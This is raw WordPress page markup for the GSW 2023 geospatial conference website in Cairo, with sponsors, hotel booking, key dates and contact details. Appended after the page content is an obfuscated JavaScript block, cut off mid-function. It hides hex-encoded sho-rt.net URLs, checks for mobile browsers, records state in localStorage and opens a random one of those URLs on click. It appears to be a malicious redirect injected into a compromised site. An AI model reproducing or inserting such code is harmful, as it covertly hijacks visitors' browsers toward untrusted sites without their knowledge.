target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 